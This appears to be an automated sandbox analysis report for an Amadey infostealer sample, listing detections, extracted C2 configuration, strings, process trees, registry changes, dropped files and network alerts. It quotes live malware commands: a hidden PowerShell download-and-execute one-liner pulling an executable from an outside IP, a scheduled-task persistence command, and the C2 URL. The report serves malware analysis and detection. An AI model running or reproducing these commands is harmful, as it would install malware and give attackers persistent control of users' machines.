| File name: | 2025-05-17_34ad73149d38d0344a3df588d70baa46_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer |
| Full analysis: | https://app.any.run/tasks/5647e95a-9dac-4d00-85fd-6fdd4145b5ea |
| Verdict: | Malicious activity |
| Threats: | Amadey is a formidable Windows infostealer threat, characterized by its persistence mechanisms, modular design, and ability to execute various malicious tasks. |
| Analysis date: | May 17, 2025, 20:09:45 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/vnd.microsoft.portable-executable |
| File info: | PE32 executable (GUI) Intel 80386, for MS Windows, 5 sections |
| MD5: | 34AD73149D38D0344A3DF588D70BAA46 |
| SHA1: | CC76BCA7F0278F3597A09A775865D0B353A3AB3A |
| SHA256: | 8DB0BEB98B2C51E5C2FC6A043A198EFC572301C027C1DEA03EE039E316F50F50 |
| SSDEEP: | 49152:QPPkzemqoSut3Jh4+QQ/btosJwIA4hHmZlKH2Tw/Pq83zw0bCjvk9G661QGtB/Xo:SP/mp7t3T4+B/btosJwIA4hHmZlKH2TP |
MALICIOUS
Uses Task Scheduler to run other applications
- cmd.exe (PID: 5556)
Script downloads file (POWERSHELL)
- powershell.exe (PID: 5800)
- powershell.exe (PID: 5608)
AMADEY mutex has been found
- TempZYLSD09GWVR3RAOXA4RCQKIQSEVCPAYG.EXE (PID: 6572)
- ramez.exe (PID: 6028)
- TempZYLSD09GWVR3RAOXA4RCQKIQSEVCPAYG.EXE (PID: 1180)
- ramez.exe (PID: 6228)
- ramez.exe (PID: 6644)
Run PowerShell with an invisible window
- powershell.exe (PID: 5800)
- powershell.exe (PID: 5608)
Request from PowerShell that ran from MSHTA.EXE
- powershell.exe (PID: 5800)
- powershell.exe (PID: 5608)
AMADEY has been detected (SURICATA)
- ramez.exe (PID: 6028)
Connects to the CnC server
- ramez.exe (PID: 6028)
AMADEY has been detected (YARA)
- ramez.exe (PID: 6028)
SUSPICIOUS
Starts CMD.EXE for commands execution
- 2025-05-17_34ad73149d38d0344a3df588d70baa46_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe (PID: 7084)
Starts process via Powershell
- powershell.exe (PID: 5800)
- powershell.exe (PID: 5608)
Probably download files using WebClient
- mshta.exe (PID: 1628)
- mshta.exe (PID: 5376)
Executable content was dropped or overwritten
- powershell.exe (PID: 5800)
- TempZYLSD09GWVR3RAOXA4RCQKIQSEVCPAYG.EXE (PID: 6572)
Found IP address in command line
- powershell.exe (PID: 5800)
- powershell.exe (PID: 5608)
Manipulates environment variables
- powershell.exe (PID: 5800)
- powershell.exe (PID: 5608)
Starts POWERSHELL.EXE for commands execution
- mshta.exe (PID: 1628)
- mshta.exe (PID: 5376)
Process requests binary or script from the Internet
- powershell.exe (PID: 5800)
- powershell.exe (PID: 5608)
Connects to the server without a host name
- powershell.exe (PID: 5800)
- ramez.exe (PID: 6028)
- powershell.exe (PID: 5608)
Potential Corporate Privacy Violation
- powershell.exe (PID: 5800)
- powershell.exe (PID: 5608)
Reads security settings of Internet Explorer
- ramez.exe (PID: 6028)
- TempZYLSD09GWVR3RAOXA4RCQKIQSEVCPAYG.EXE (PID: 6572)
Contacting a server suspected of hosting an CnC
- ramez.exe (PID: 6028)
Starts itself from another location
- TempZYLSD09GWVR3RAOXA4RCQKIQSEVCPAYG.EXE (PID: 6572)
There is functionality for taking screenshot (YARA)
- ramez.exe (PID: 6028)
There is functionality for enable RDP (YARA)
- ramez.exe (PID: 6028)
The process executes via Task Scheduler
- ramez.exe (PID: 6644)
- ramez.exe (PID: 6228)
INFO
Checks supported languages
- 2025-05-17_34ad73149d38d0344a3df588d70baa46_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe (PID: 7084)
- TempZYLSD09GWVR3RAOXA4RCQKIQSEVCPAYG.EXE (PID: 6572)
- ramez.exe (PID: 6028)
- TempZYLSD09GWVR3RAOXA4RCQKIQSEVCPAYG.EXE (PID: 1180)
- ramez.exe (PID: 6228)
- ramez.exe (PID: 6644)
Reads mouse settings
- 2025-05-17_34ad73149d38d0344a3df588d70baa46_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe (PID: 7084)
The sample compiled with english language support
- 2025-05-17_34ad73149d38d0344a3df588d70baa46_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe (PID: 7084)
Reads the computer name
- 2025-05-17_34ad73149d38d0344a3df588d70baa46_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe (PID: 7084)
- TempZYLSD09GWVR3RAOXA4RCQKIQSEVCPAYG.EXE (PID: 6572)
- ramez.exe (PID: 6028)
Create files in a temporary directory
- 2025-05-17_34ad73149d38d0344a3df588d70baa46_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe (PID: 7084)
- TempZYLSD09GWVR3RAOXA4RCQKIQSEVCPAYG.EXE (PID: 6572)
Auto-launch of the file from Task Scheduler
- cmd.exe (PID: 5556)
Reads Internet Explorer settings
- mshta.exe (PID: 1628)
- mshta.exe (PID: 5376)
The executable file from the user directory is run by the Powershell process
- TempZYLSD09GWVR3RAOXA4RCQKIQSEVCPAYG.EXE (PID: 6572)
- TempZYLSD09GWVR3RAOXA4RCQKIQSEVCPAYG.EXE (PID: 1180)
Disables trace logs
- powershell.exe (PID: 5800)
- powershell.exe (PID: 5608)
Checks proxy server information
- powershell.exe (PID: 5800)
- ramez.exe (PID: 6028)
- powershell.exe (PID: 5608)
- slui.exe (PID: 6192)
Manual execution by a user
- mshta.exe (PID: 5376)
Process checks computer location settings
- TempZYLSD09GWVR3RAOXA4RCQKIQSEVCPAYG.EXE (PID: 6572)
Reads the software policy settings
- slui.exe (PID: 6192)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
Amadey
(PID) Process(6028) ramez.exe
C2185.156.72.96
URLhttp://185.156.72.96/te4h2nus/index.php
Version5.34
Options
Drop directoryd610cf342e
Drop nameramez.exe
Strings (125)lv:
msi
Kaspersky Lab
av:
|
#
"
\App
00000422
dm:
Powershell.exe
ProgramData\
ps1
rundll32
http://
Content-Disposition: form-data; name="data"; filename="
SOFTWARE\Microsoft\Windows NT\CurrentVersion
dll
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
id:
VideoID
cred.dll|clip.dll|
0000043f
cmd
00000423
SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
-executionpolicy remotesigned -File "
2022
------
2016
og:
\0000
CurrentBuild
2019
:::
S-%lu-
" && timeout 1 && del
ProductName
Panda Security
ESET
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
/k
+++
?scr=1
Doctor Web
GET
SYSTEM\ControlSet001\Services\BasicDisplay\Video
/quiet
.jpg
d610cf342e
vs:
sd:
rundll32.exe
"taskkill /f /im "
pc:
random
=
360TotalSecurity
<d>
wb
Content-Type: multipart/form-data; boundary=----
Startup
Norton
&& Exit"
os:
https://
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
2025
Avira
%-lu
zip
POST
"
Content-Type: application/octet-stream
Rem
/te4h2nus/index.php
------
5.34
<c>
clip.dll
AVAST Software
\
shell32.dll
" && ren
e3
ramez.exe
kernel32.dll
DefaultSettings.XResolution
d1
DefaultSettings.YResolution
185.156.72.96
r=
cred.dll
--
GetNativeSystemInfo
-%lu
ComputerName
&unit=
Keyboard Layout\Preload
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
ar:
Sophos
%USERPROFILE%
exe
e1
e2
st=s
Programs
0123456789
un:
rb
bi:
abcdefghijklmnopqrstuvwxyz0123456789-_
SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
cmd /C RMDIR /s/q
Bitdefender
-unicode-
AVG
WinDefender
&&
shutdown -s -t 0
Comodo
00000419
Content-Type: application/x-www-form-urlencoded
/Plugins/
Main
TRiD
| .exe | | | Win64 Executable (generic) (76.4) |
|---|---|---|
| .exe | | | Win32 Executable (generic) (12.4) |
| .exe | | | Generic Win/DOS Executable (5.5) |
| .exe | | | DOS Executable Generic (5.5) |
EXIF
EXE
| MachineType: | Intel 386 or later, and compatibles |
|---|---|
| TimeStamp: | 2025:05:17 03:19:54+00:00 |
| ImageFileCharacteristics: | Executable, Large address aware, 32-bit |
| PEType: | PE32 |
| LinkerVersion: | 14.16 |
| CodeSize: | 633856 |
| InitializedDataSize: | 326144 |
| UninitializedDataSize: | - |
| EntryPoint: | 0x20577 |
| OSVersion: | 5.1 |
| ImageVersion: | - |
| SubsystemVersion: | 5.1 |
| Subsystem: | Windows GUI |
| FileVersionNumber: | 0.0.0.0 |
| ProductVersionNumber: | 0.0.0.0 |
| FileFlagsMask: | 0x0000 |
| FileFlags: | (none) |
| FileOS: | Win32 |
| ObjectFileType: | Executable application |
| FileSubtype: | - |
| LanguageCode: | English (British) |
| CharacterSet: | Unicode |
Total processes
140
Monitored processes
16
Malicious processes
10
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 780 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1180 | "C:\Users\admin\AppData\Local\TempZYLSD09GWVR3RAOXA4RCQKIQSEVCPAYG.EXE" | C:\Users\admin\AppData\Local\TempZYLSD09GWVR3RAOXA4RCQKIQSEVCPAYG.EXE | — | powershell.exe | |||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
| 1628 | mshta C:\Users\admin\AppData\Local\Temp\FnUj2MURh.hta | C:\Windows\SysWOW64\mshta.exe | — | 2025-05-17_34ad73149d38d0344a3df588d70baa46_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 11.00.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2088 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5376 | mshta C:\Users\admin\AppData\Local\Temp\FnUj2MURh.hta | C:\Windows\System32\mshta.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 11.00.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5392 | schtasks /create /tn 3zi51maXPC9 /tr "mshta C:\Users\admin\AppData\Local\Temp\FnUj2MURh.hta" /sc minute /mo 25 /ru "admin" /f | C:\Windows\SysWOW64\schtasks.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Task Scheduler Configuration Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5556 | C:\WINDOWS\system32\cmd.exe /c schtasks /create /tn 3zi51maXPC9 /tr "mshta C:\Users\admin\AppData\Local\Temp\FnUj2MURh.hta" /sc minute /mo 25 /ru "admin" /f | C:\Windows\SysWOW64\cmd.exe | — | 2025-05-17_34ad73149d38d0344a3df588d70baa46_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5608 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ZYLSD09GWVR3RAOXA4RCQKIQSEVCPAYG.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.156.72.2/testmine/random.exe',$d);Start-Process $d; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | mshta.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5800 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ZYLSD09GWVR3RAOXA4RCQKIQSEVCPAYG.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.156.72.2/testmine/random.exe',$d);Start-Process $d; | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | mshta.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6028 | "C:\Users\admin\AppData\Local\Temp\d610cf342e\ramez.exe" | C:\Users\admin\AppData\Local\Temp\d610cf342e\ramez.exe | TempZYLSD09GWVR3RAOXA4RCQKIQSEVCPAYG.EXE | ||||||||||||
User: admin Integrity Level: MEDIUM Modules
Amadey(PID) Process(6028) ramez.exe C2185.156.72.96 URLhttp://185.156.72.96/te4h2nus/index.php Version5.34 Options Drop directoryd610cf342e Drop nameramez.exe Strings (125)lv: msi Kaspersky Lab av: | # " \App 00000422 dm: Powershell.exe ProgramData\ ps1 rundll32 http:// Content-Disposition: form-data; name="data"; filename=" SOFTWARE\Microsoft\Windows NT\CurrentVersion dll SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders id: VideoID cred.dll|clip.dll| 0000043f cmd 00000423 SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName -executionpolicy remotesigned -File " 2022 ------ 2016 og: \0000 CurrentBuild 2019 ::: S-%lu- " && timeout 1 && del ProductName Panda Security ESET SOFTWARE\Microsoft\Windows\CurrentVersion\Run /k +++ ?scr=1 Doctor Web GET SYSTEM\ControlSet001\Services\BasicDisplay\Video /quiet .jpg d610cf342e vs: sd: rundll32.exe "taskkill /f /im " pc: random = 360TotalSecurity <d> wb Content-Type: multipart/form-data; boundary=---- Startup Norton && Exit" os: https:// SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce 2025 Avira %-lu zip POST "
Content-Type: application/octet-stream Rem /te4h2nus/index.php ------ 5.34 <c> clip.dll AVAST Software \ shell32.dll " && ren e3 ramez.exe kernel32.dll DefaultSettings.XResolution d1 DefaultSettings.YResolution 185.156.72.96 r= cred.dll -- GetNativeSystemInfo -%lu ComputerName &unit= Keyboard Layout\Preload SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders ar: Sophos %USERPROFILE% exe e1 e2 st=s Programs 0123456789 un: rb bi: abcdefghijklmnopqrstuvwxyz0123456789-_ SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\ cmd /C RMDIR /s/q Bitdefender -unicode- AVG WinDefender && shutdown -s -t 0 Comodo 00000419 Content-Type: application/x-www-form-urlencoded /Plugins/ Main | |||||||||||||||
Total events
14 930
Read events
14 907
Write events
23
Delete events
0
Modification events
| (PID) Process: | (1628) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
| Operation: | write | Name: | CachePrefix |
Value: | |||
| (PID) Process: | (1628) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
| Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
| (PID) Process: | (1628) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
| Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
| (PID) Process: | (5800) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (5800) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableAutoFileTracing |
Value: 0 | |||
| (PID) Process: | (5800) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
| (PID) Process: | (5800) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | FileTracingMask |
Value: | |||
| (PID) Process: | (5800) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | ConsoleTracingMask |
Value: | |||
| (PID) Process: | (5800) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | MaxFileSize |
Value: 1048576 | |||
| (PID) Process: | (5800) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | FileDirectory |
Value: %windir%\tracing | |||
Executable files
2
Suspicious files
2
Text files
5
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 5800 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xwf5uvnr.fsn.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 5800 | powershell.exe | C:\Users\admin\AppData\Local\TempZYLSD09GWVR3RAOXA4RCQKIQSEVCPAYG.EXE | executable | |
MD5:26CC5A6CFD8E8ECC433337413C14CDDB | SHA256:2D904D576B46236BAF504DBA21775F6EBBBD0F65272A9C2FCA1C6798184FA4E8 | |||
| 6572 | TempZYLSD09GWVR3RAOXA4RCQKIQSEVCPAYG.EXE | C:\Users\admin\AppData\Local\Temp\d610cf342e\ramez.exe | executable | |
MD5:26CC5A6CFD8E8ECC433337413C14CDDB | SHA256:2D904D576B46236BAF504DBA21775F6EBBBD0F65272A9C2FCA1C6798184FA4E8 | |||
| 5608 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_gpqz1lxw.z4r.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 5608 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ijzuac1c.dmv.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6572 | TempZYLSD09GWVR3RAOXA4RCQKIQSEVCPAYG.EXE | C:\Windows\Tasks\ramez.job | binary | |
MD5:DDD7A48D9805D40AB94C71646C43665B | SHA256:1E04168C8784B90F4060428265D28A294A3CA8B60BD011D5796CB411DC68791D | |||
| 5800 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_spgv3ssy.2hn.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 5800 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:E5D0D048AA63F7367EB0F2BE9797A547 | SHA256:2133C243BBBFB13E603F5A3586F2A62D0402CD133AB7C2B92F4143A98927A7EF | |||
| 7084 | 2025-05-17_34ad73149d38d0344a3df588d70baa46_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe | C:\Users\admin\AppData\Local\Temp\FnUj2MURh.hta | html | |
MD5:52ABAE31674EB6E74C9260915A090906 | SHA256:5E4EBB435AC34245DDB2A72CFC4F21EEA6B2950422C712AEEEB6AAB5D42AE876 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
13
TCP/UDP connections
54
DNS requests
17
Threats
12
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
2104 | svchost.exe | GET | 200 | 2.23.246.101:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
5800 | powershell.exe | GET | 200 | 185.156.72.2:80 | http://185.156.72.2/testmine/random.exe | unknown | — | — | unknown |
6028 | ramez.exe | POST | 200 | 185.156.72.96:80 | http://185.156.72.96/te4h2nus/index.php | unknown | — | — | malicious |
6028 | ramez.exe | POST | 200 | 185.156.72.96:80 | http://185.156.72.96/te4h2nus/index.php | unknown | — | — | malicious |
5608 | powershell.exe | GET | 200 | 185.156.72.2:80 | http://185.156.72.2/testmine/random.exe | unknown | — | — | unknown |
2104 | svchost.exe | GET | 200 | 2.16.168.124:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
2984 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.1.crl | unknown | — | — | whitelisted |
2984 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
2984 | SIHClient.exe | GET | 200 | 23.48.23.176:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl | unknown | — | — | whitelisted |
2984 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.1.crl | unknown | — | — | whitelisted |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
2104 | svchost.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
— | — | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
2104 | svchost.exe | 2.16.168.124:80 | crl.microsoft.com | Akamai International B.V. | RU | whitelisted |
2104 | svchost.exe | 2.23.246.101:80 | www.microsoft.com | Ooredoo Q.S.C. | QA | whitelisted |
3216 | svchost.exe | 172.211.123.250:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted |
6544 | svchost.exe | 40.126.31.71:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
5800 | powershell.exe | 185.156.72.2:80 | — | Tov Vaiz Partner | RU | unknown |
2104 | svchost.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
DNS requests
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
client.wns.windows.com |
| whitelisted |
login.live.com |
| whitelisted |
slscr.update.microsoft.com |
| whitelisted |
fe3cr.delivery.mp.microsoft.com |
| whitelisted |
activation-v2.sls.microsoft.com |
| whitelisted |
nexusrules.officeapps.live.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
5800 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Download from dotted-quad Host |
5800 | powershell.exe | Potential Corporate Privacy Violation | ET INFO PE EXE or DLL Windows file download HTTP |
5800 | powershell.exe | Misc activity | ET INFO Packed Executable Download |
5800 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
5800 | powershell.exe | Potentially Bad Traffic | ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response |
6028 | ramez.exe | Malware Command and Control Activity Detected | BOTNET [ANY.RUN] Amadey HTTP POST Request (st=s) |
6028 | ramez.exe | Malware Command and Control Activity Detected | ET MALWARE Amadey CnC Response |
5608 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Download from dotted-quad Host |
5608 | powershell.exe | Potential Corporate Privacy Violation | ET INFO PE EXE or DLL Windows file download HTTP |
5608 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |